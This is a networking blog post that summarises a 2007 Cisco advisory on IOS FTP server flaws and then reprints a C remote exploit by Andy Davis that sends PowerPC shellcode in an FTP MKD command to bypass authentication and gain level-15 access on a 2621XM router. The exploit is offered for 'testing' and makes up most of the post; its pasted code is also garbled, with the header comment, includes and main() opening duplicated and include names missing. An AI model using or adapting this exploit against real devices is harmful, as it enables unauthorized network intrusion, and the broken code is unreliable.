Exploit

How to test Cisco IOS FTP Server Multiple Vulnerabilities

By Fabio Semperboni

On 09 May 2007, Cisco published a Security advisory about multiple IOS FTP Server vulnetabilities.

Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue. Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code. Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default.

The vulnerable produtcs are IOS versions 11.3, 12.0, 12.1, 12.2, 12.3 and 12.4 contain the IOS FTP server feature.

If somebody would test this vulnerability (ONLY TEST…), I have find the exploit on the SecurityFocus site.

/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008               

 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               

 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router    

 Removes the requirement to authenticate and escalates to level 15    

 *********************************************************************
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.
 I'm sure the PowerPC shellcoders out there will work it out...
 *********************************************************************

 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research                                

 iosftpexploit  googlemail 'dot' com                              

*/

#include
#include
#include
#include 

#define PORT 21

int main(int argc, char **argv)
{
/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008               

 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               

 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router    

 Removes the requirement to authenticate and escalates to level 15    

 *********************************************************************
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.
 I'm sure the PowerPC shellcoders out there will work it out...
 *********************************************************************

 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research                                

 iosftpexploit  googlemail 'dot' com                              

*/

#include
#include
#include
#include 

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis
2008\n");

        printf ("\nUsage: %s \n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

References:

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Previous article
Preventing STP forwarding loops
Next article
2 new Cisco critical vulnerabilities

Popular posts

802.1X Deployment Guide: Interface configuration

Tutorial
In a previous post, I explained how to configure dot1x in a switch global configuration. In this article, I'll explain the best practice about...

802.1X Deployment Guide: Global configuration

Tutorial
In the previous article, I illustrated what are the dot1x and the benefits related to it. Just to remember that 802.1X authentication involves three...

Using NPS to manage Cisco devices

Tutorial
In a a previous article, I illustated how to configure Radius server on Cisco switch/router. In this tutorial, I explain how to install and...

NAT and PAT: a complete explanation

Tutorial
Network address translation (NAT) is the process of modifying IP address information in IP packet headers while in transit across a traffic routing device. There...

How to trace MAC address

Tutorial
Traceroute is a tool for measuring the route path and transit times of packets across an Internet Protocol (IP) network. Traceroute sends a sequence of...

StackWise Virtual on Catalyst 9500

Tutorial
During the Cisco Live 2016 in Las Vegas, Cisco presented the new feature named "StackWise virtual" supported by the IOS XE Denali in the...

How to log everything with SecureCRT

Tutorial
Unlike my technical articles about configurations, protocols and so on, in this tutorial I will explain how to log automatically all SecureCRT sessions. For those...

How to upgrade a Cisco stack

Tutorial
One of the task of a good Network engineer is to update the Cisco IOS to avoid bugs and to have new features; but...

How to schedule a reload

Tutorial
Not everyone knows that the reload command permits to schedule a reboot system; for instance, to plan a night router restart or during a...

Friends

Copyright © 2008 - 2022 Ciscozine.
All rights reserved.